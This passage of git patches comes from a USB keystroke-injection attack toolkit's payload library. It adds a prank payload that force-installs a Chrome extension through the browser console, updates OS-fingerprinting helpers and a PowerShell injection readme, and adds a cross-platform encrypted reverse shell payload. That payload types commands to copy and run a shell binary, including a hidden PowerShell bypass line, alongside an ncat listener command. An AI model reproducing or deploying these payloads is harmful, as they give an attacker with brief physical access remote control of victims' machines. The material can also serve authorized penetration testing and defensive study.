b/payloads/library/prank/ncage/payload.txt @@ -0,0 +1,44 @@ +#!/bin/bash + +# ATTENTION: Requires newest firmware with newest extensions + +# Installs the ncage (or any) Google Chrome extension +# using jquery which is kindly supplied by the app store. + +## Status +# | LED | Status | +# | --------- | ----------- | +# | Magenta Solid | Setting up | +# | Blue Blinking | Attacking | +# | Green | Finished | +# | Red | Failed | + +## Setup +LED SETUP +ATTACKMODE AUTO_ETHERNET ETHERNET_TIMEOUT_10 +GET TARGET_OS +GET SWITCH_POSITION + +LED ATTACK + +case "$TARGET_OS" in + + WINDOWS) + ATTACKMODE HID + QUACK ${SWITCH_POSITION}/win.txt + LED FINISH + ;; + + MACOS) + MAC_HAPPY ATTACKMODE HID + QUACK ${SWITCH_POSITION}/osx.txt + LED FINISH + ;; + + *) + DEBUG "ncage" "OS Not Detected" + LED FAIL2 + ;; + +esac + diff --git a/payloads/library/prank/ncage/readme.md b/payloads/library/prank/ncage/readme.md new file mode 100644 index 00000000..4921cb84 --- /dev/null +++ b/payloads/library/prank/ncage/readme.md @@ -0,0 +1,26 @@ + +# nCage + +Author: audibleblink +Version: 2.0 + +## Description + +ATTENTION: Requires newest firmware (1.5+) with newest extensions + +Installs the ncage (or any) Google Chrome extension +using jquery which is kindly supplied by the app store. + +## Configuration +* Configure each ducky.{win,osx} file to your liking + +## Requirements +Just plug and play + +## Status +| LED | Status | +| --------- | ----------- | +| Magenta Solid | Setting up | +| Blue Blinking | Attacking | +| Green | Finished | + diff --git a/payloads/library/prank/ncage/win.txt b/payloads/library/prank/ncage/win.txt new file mode 100644 index 00000000..ac6a4963 --- /dev/null +++ b/payloads/library/prank/ncage/win.txt @@ -0,0 +1,35 @@ +REM Title: Chrome Extension Installer +REM Author: audibleblink +DELAY 3000 + +REM Open Extension URL +GUI r +DELAY 600 +STRING chrome https://chrome.google.com/webstore/detail/ncage/hnbmfljfohghaepamnfokgggaejlmfol +DELAY 200 +ENTER + +DELAY 8000 + +REM Open the JavaScript console in the browser +CTRL-SHIFT j + +DELAY 4000 + +REM Use jQuery to click the Install button +STRING $("div[role='button']").click() +ENTER + +DELAY 2000 + +REM Confirm the installation +TAB +DELAY 300 +SPACE + +DELAY 5000 + +REM Close the tabs you just opened +CTRL w +DELAY 300 +CTRL w From 9011db7faebf7d3f77a390f1f175b3863f32d3b0 Mon Sep 17 00:00:00 2001 From: Tudor Gheorghiu <32748771+Prodicode@users.noreply.github.com> Date: Sun, 28 Jan 2018 01:27:46 +0200 Subject: [PATCH 11/16] Update unicorn readme.md (#302) --- .../remote_access/Unicorn_PowerShell_Injection/readme.md | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/payloads/library/remote_access/Unicorn_PowerShell_Injection/readme.md b/payloads/library/remote_access/Unicorn_PowerShell_Injection/readme.md index 1f199775..9a4ea326 100644 --- a/payloads/library/remote_access/Unicorn_PowerShell_Injection/readme.md +++ b/payloads/library/remote_access/Unicorn_PowerShell_Injection/readme.md @@ -16,10 +16,8 @@ Configuring this payload is pretty time-consuming, but it's worth it. 1. Download Trustedsec's Unicorn: https://github.com/trustedsec/unicorn and use it to generate a powershell attack script. 2. After you generate a powershell script, execute ```$ msfconsole -r unicorn.rc``` in the same directory in order to start the listener. -3. Transfer **payload.txt** to any of your switches, then open it. -4. Replace ```your_powershell_attack_here``` with the contents of your **powershell_attack.txt** file which was generated. -5. Put a **\\** (backslash) before each special character (**\,** **\"** **\'** **\:** **\;** **\(** **\)** **\[** **\]** **\+**). -6. Save the **payload.txt** file and eject Bash Bunny. You are good to go! Sessions will be opened in the metasploit's listener! +3. You can use [this software(unicorn bash bunny payload generator)](https://github.com/Prodicode/bash-bunny-unicorn-payload-generator) to generate a **payload.txt** from the **powershell_attack.txt**. +4. Transfer the **payload.txt** to one of the switches on the Bash Bunny. You're ready to go! ## Status From 5f31a0be02cdb701b6605f435d8909258dee449d Mon Sep 17 00:00:00 2001 From: Aidan Holland Date: Tue, 30 Jan 2018 17:16:23 -0500 Subject: [PATCH 12/16] Fix README.md (#321) --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 0d9fd4c4..5063984e 100644 --- a/README.md +++ b/README.md @@ -1,6 +1,6 @@ # Payload Library for the Bash Bunny by Hak5 -![Bash Bunny](https://cdn.shopify.com/s/files/1/0068/2142/products/bashbunny_2a_large.png "Bash Bunny") +![Bash Bunny](https://www.hak5.org/wp-content/uploads/2017/10/icon3-169x169.png) * [Purchase at HakShop.com](https://hakshop.com/products/bash-bunny "Purchase at HakShop.com") * [Documentation and Wiki](http://wiki.bashbunny.com/#!index.md "Documentation and Wiki") From 38a7460fe65be9b70dba1cee61995a7cadf87cf4 Mon Sep 17 00:00:00 2001 From: Aidan Holland Date: Tue, 30 Jan 2018 17:17:09 -0500 Subject: [PATCH 13/16] Update GET TARGET_OS so it works with AUTO_ETHERNET (#320) --- payloads/extensions/get.sh | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/payloads/extensions/get.sh b/payloads/extensions/get.sh index f58026e6..0ebd6e7d 100755 --- a/payloads/extensions/get.sh +++ b/payloads/extensions/get.sh @@ -19,11 +19,11 @@ function GET() { ;; "TARGET_OS") TARGET_IP=$(cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq) - ScanForOS=$(nmap -Pn -O $TARGET_IP -p1) - [[ $ScanForOS == *"Too many fingerprints"* ]] && ScanForOS=$(nmap -Pn -O --osscan-guess $TARGET_IP) - [[ $ScanForOS == *"Windows"* ]] && export TARGET_OS='WINDOWS' && return - [[ $ScanForOS == *"Linux"* ]] && export TARGET_OS='LINUX' && return - [[ $ScanForOS == *"Apple"* ]] && export TARGET_OS='MACOS' && return + ScanForOS=$(nmap -Pn -O $TARGET_IP -p1 -v2) + [[ $ScanForOS == *"Too many fingerprints"* ]] && ScanForOS=$(nmap -Pn -O $TARGET_IP --osscan-guess -v2) + [[ "${ScanForOS,,}" == *"windows"* ]] && export TARGET_OS='WINDOWS' && return + [[ "${ScanForOS,,}" == *"apple"* ]] && export TARGET_OS='MACOS' && return + [[ "${ScanForOS,,}" == *"linux"* ]] && export TARGET_OS='LINUX' && return export TARGET_OS='UNKNOWN' ;; esac From 4df763c4a41682d25831d8ee5b93a39d85e68051 Mon Sep 17 00:00:00 2001 From: Aidan Holland Date: Tue, 30 Jan 2018 17:17:56 -0500 Subject: [PATCH 14/16] Update mac_happy extension (#319) --- payloads/extensions/mac_happy.sh | 23 ++++++++++++++++++----- 1 file changed, 18 insertions(+), 5 deletions(-) diff --git a/payloads/extensions/mac_happy.sh b/payloads/extensions/mac_happy.sh index 97aabaf0..3323a90b 100755 --- a/payloads/extensions/mac_happy.sh +++ b/payloads/extensions/mac_happy.sh @@ -2,15 +2,28 @@ # Title: Mac_Happy # Author: thehappydinoa -# Target: Mac -# Version: 0.2 +# Target: macOS +# Version: 0.3 # # Makes Mac happy by correctly setting pid and vid -# Use by running mac_happy ATTACKMODE HID +# Use by running MAC_HAPPY HID/ETHERNET/... # function MAC_HAPPY() { - [[ "$#" -gt 1 && "$1" == "ATTACKMODE" ]] || exit 1 - eval "$@ vid_0x05ac pid_0x021e" + [[ "$#" -gt 1 ]] || exit 1 + case "$1" in + HID) + ATTACKMODE HID vid_0x05ac pid_0x021e + ;; + ETHERNET) + ATTACKMODE ECM_ETHERNET vid_0x05ac pid_0x021e + ;; + ATTACKMODE) + eval "$@ vid_0x05ac pid_0x021e" + ;; + *) + exit 1 + ;; + esac } export -f MAC_HAPPY From 032061688d61f2ce787a0d1d0db55f03e212a630 Mon Sep 17 00:00:00 2001 From: Darren Kitchen Date: Tue, 30 Jan 2018 22:10:24 -0800 Subject: [PATCH 15/16] WAIT extension pauses until switch position changes --- payloads/extensions/wait.sh | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 payloads/extensions/wait.sh diff --git a/payloads/extensions/wait.sh b/payloads/extensions/wait.sh new file mode 100644 index 00000000..5219bd06 --- /dev/null +++ b/payloads/extensions/wait.sh @@ -0,0 +1,17 @@ +#!/bin/bash +# +# WAIT v1 by @Hak5Darren +# Waits blocks the payload from continuing until the switch position has changed +# Usage: WAIT + +function WAIT() { + GET SWITCH_POSITION + TEST=$SWITCH_POSITION + while true + do GET SWITCH_POSITION + if [ $SWITCH_POSITION != $TEST ]; then break; fi + sleep 1 + done +} + +export -f WAIT From 65d652a15c7a8e683e9d7ff8dfcdbf9046a77401 Mon Sep 17 00:00:00 2001 From: metalkey Date: Wed, 11 Apr 2018 21:21:40 +1000 Subject: [PATCH 16/16] Add Hershell Encrypted Reverse shell payload (#335) --- .../README.md | 14 +++ .../payload.txt | 118 ++++++++++++++++++ 2 files changed, 132 insertions(+) create mode 100644 payloads/library/remote_access/Hershell_MacLinuxWindows_ReverseShell/README.md create mode 100644 payloads/library/remote_access/Hershell_MacLinuxWindows_ReverseShell/payload.txt diff --git a/payloads/library/remote_access/Hershell_MacLinuxWindows_ReverseShell/README.md b/payloads/library/remote_access/Hershell_MacLinuxWindows_ReverseShell/README.md new file mode 100644 index 00000000..d4143993 --- /dev/null +++ b/payloads/library/remote_access/Hershell_MacLinuxWindows_ReverseShell/README.md @@ -0,0 +1,14 @@ +# Hershell Encrypted Reverse Shell (Cross-platform - Manual Mode) + +Author: m3t4lk3y
+Creds: Ronan Kervella (Creator of Hershell)
+Version: Version 0.5
+ +## Instructions + +Hershell Github: https://github.com/sysdream/hershell (read all instructions on Hershell git before starting) + +1. Compile all payloads and place binaries in the `payloads\$SWITCH_POSITION` directory (Double check binary names. Defaults are `mac32`, `linux32`, `win32.exe`) +2. Uncomment desired target OS payload lines and ensure others are commented out +3. Start ncat listener on your attacking machine, that is to receive the reverse shell (e.g. `ncat --ssl --ssl-cert server.pem --ssl-key server.key -lvp 4343`) +4. Execute attack via Bash Bunny diff --git a/payloads/library/remote_access/Hershell_MacLinuxWindows_ReverseShell/payload.txt b/payloads/library/remote_access/Hershell_MacLinuxWindows_ReverseShell/payload.txt new file mode 100644 index 00000000..f8f53069 --- /dev/null +++ b/payloads/library/remote_access/Hershell_MacLinuxWindows_ReverseShell/payload.txt @@ -0,0 +1,118 @@ +#!/bin/bash +# Title: Hershell Encrypted Reverse Shell (Cross-platform - Manual Mode) +# Author: m3t4lk3y +# Version: 0.5 +# Target: Windows, Mac OSX, Linux +# Creds: Ronan Kervella (Creator of Hershell) - https://github.com/sysdream/hershell + +# Instructions: +# Hershell Github: https://github.com/sysdream/hershell (read all instructions on Hershell git before starting) +# 1. Compile all payloads and place binaries in the payloads\$SWITCH_POSITION directory (Double check binary names. Defaults are mac32, linux32, win32.exe) +# 2. Uncomment desired target OS payload lines and ensure others are commented out +# 3. Start ncat listener on your attacking machine, that is to receive the reverse shell (e.g. ncat --ssl --ssl-cert server.pem --ssl-key server.key -lvp 4343) +# 4. Execute attack via Bash Bunny + +# SETUP +DRIVER_LABEL='WINDOWS' # Drive label for your Bash Bunny +LED R +GET SWITCH_POSITION # Gets switch position (e.g. switch2) +ATTACKMODE STORAGE HID SERIAL # Keyboard HID Attack + Storage + Serial + +# Modified RUN helper +function RUN() { + local os=$1 + shift + [[ -z "$os" || -z "$*" ]] && exit 1 + case "$os" in + WIN) + QUACK GUI m + QUACK DELAY 500 + QUACK GUI r + QUACK DELAY 500 + QUACK STRING cmd.exe + QUACK DELAY 100 + QUACK ENTER + QUACK DELAY 500 + QUACK STRING "$@" + QUACK DELAY 100 + QUACK ENTER + ;; + OSX) + QUACK GUI SPACE + QUACK DELAY 100 + QUACK STRING terminal + QUACK DELAY 100 + QUACK ENTER + QUACK GUI t + QUACK DELAY 100 + QUACK STRING /bin/bash + QUACK DELAY 100 + QUACK ENTER + QUACK STRING "$@" + QUACK DELAY 100 + QUACK ENTER + QUACK DELAY 100 + QUACK STRING "exit" + QUACK DELAY 100 + QUACK ENTER + QUACK DELAY 100 + QUACK STRING "exit" + QUACK DELAY 100 + QUACK ENTER + ;; + UNITY) + QUACK ALT F2 + QUACK DELAY 1000 + QUACK STRING xterm + QUACK DELAY 1000 + QUACK ENTER + QUACK DELAY 1000 + QUACK STRING /bin/bash + QUACK DELAY 1000 + QUACK ENTER + QUACK DELAY 500 + QUACK STRING cd /media/'$USER' + QUACK DELAY 500 + QUACK ENTER + QUACK DELAY 500 + QUACK STRING "$@" + QUACK DELAY 500 + QUACK ENTER + QUACK DELAY 500 + QUACK STRING "exit" + QUACK DELAY 500 + QUACK ENTER + QUACK DELAY 500 + QUACK STRING "exit" + QUACK DELAY 500 + QUACK ENTER + ;; + *) + exit 1 + ;; + esac +} +export -f RUN + +# START Attack +LED Y + +# [+] Mac - Uncomment the following lines to use: +# until ls -halt /dev | head -n 5 | grep -q "nandf"; do sleep 1; done # Wait for bb to mount +# LED Y FAST +# RUN OSX "cp /Volumes/$DRIVER_LABEL/payloads/$SWITCH_POSITION/mac32 /tmp && chmod +x /tmp/mac32 && /tmp/mac32 &" + +# [+] Linux - Uncomment the following lines to use: +until dmesg | grep -q "sunxi_usb"; do sleep 1; done; sleep 5 # Wait for bb to mount +LED Y FAST +RUN UNITY "cd $DRIVER_LABEL/payloads/$SWITCH_POSITION && cp linux32 /tmp/ && chmod +x /tmp/linux32 && /tmp/linux32 &" + +# [+] Windows - Uncomment the following lines to use: +# until dmesg | grep -q "sunxi_usb"; do sleep 1; done; sleep 5 # Wait for bb to mount +# LED Y FAST +# RUN WIN powershell -NoP -NonI -W Hidden -exec bypass ".((gwmi win32_volume -f 'label=''$DRIVER_LABEL''').Name+'\payloads\\$SWITCH_POSITION\win32.exe')" + +# END +sleep 5 +LED G +# shutdown 0 # LIGHTS OUT = Shutdown and dismount (if desired)